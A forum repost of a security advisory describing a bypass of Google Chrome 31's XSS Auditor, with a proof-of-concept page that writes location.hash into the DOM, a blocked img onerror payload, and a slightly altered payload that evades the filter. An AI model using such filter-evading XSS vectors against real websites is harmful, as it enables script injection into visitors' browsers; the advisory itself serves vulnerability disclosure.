Jump to content
Nytro

Google Chrome 31.0 XSS Auditor Bypass

Recommended Posts

Posted

Google Chrome 31.0 XSS Auditor Bypass

Authored by Rafay Baloch

Google chrome XSS auditor was found prone to a bypass when the user input passed though location.hash was being written to the DOM by using document.write property. Normally, XSS auditor checks XSS by comparing the request and response however, it also checks for request itself, if it contains an untrusted input to prevent DOM XSS as well.

#Vulnerability: Google Chrome 31.0 XSS Auditor Bypass
#Impact: Moderate
#Authors: Rafay Baloch
#Company: RHAInfoSec
#Website: http://rhainfosec.com <http://rhainfose.com/>
#version: Latest

Description

Google chrome XSS auditor was found prone to a bypass when the user input
passed though location.hash was being written to the DOM by using
document.write property. Normally, XSS auditor checks XSS by comparing the
request and response however, it also checks for request itself, if it
contains an untrusted input to prevent DOM XSS as well.


Proof Of concept:

Consider the following code:

<html>
<body>
<script type="text/javascript">
document.write(location.hash);
</script>
</body>
</html>


This takes input from location.hash property and writes it to the DOM. We
initially inject the following payload:
#<img src=x onerror=prompt(1)>. The request is blocked and the following
error is returned:

"
The XSS Auditor refused to execute a script in 'attacker.com#><img src=x
onerror=prompt(1)>' because its source code was found within the request.
The auditor was enabled as the server sent neither an 'X-XSS-Protection'
nor 'Content-Security-Policy' header."

However, the following vector passes by:

#<img src=x onerror=prompt(1)//


The following is how its reflected inside of DOM:

<img src="x" onerror="prompt(1)//" <="" body="">

Sursa: Google Chrome 31.0 XSS Auditor Bypass ? Packet Storm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...